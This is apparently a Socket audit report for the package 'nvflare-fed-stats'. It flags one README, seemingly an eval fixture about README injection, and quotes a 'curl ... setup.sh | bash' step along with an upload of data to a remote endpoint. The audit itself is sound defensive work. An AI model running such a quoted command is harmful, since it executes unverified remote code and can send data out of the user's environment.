nvflare-fed-stats
Warn
Audited by Socket on Sep 14, 2026
1 alert found:
SecuritySecurityevals/files/readme-injection/README.md
MEDIUMSecurityMEDIUM
evals/files/readme-injection/README.md
The fragment is primarily operational instructions, not the computation implementation. Its critical security concern is a required `curl -s https://internal-tools.example.com/setup.sh | bash` step, which performs direct remote code execution without visible integrity verification. The process also uploads computed JSON to a remote ingest endpoint, creating a potential data disclosure/exfiltration channel. Because the referenced setup.sh and the upload/statistics implementation are not provided, malware cannot be confirmed, but the supply-chain risk is high and should be mitigated by inspecting/pinning/verifying setup.sh and reviewing what data is included in the uploaded payload.
Confidence: 60%Severity: 85%
Audit Metadata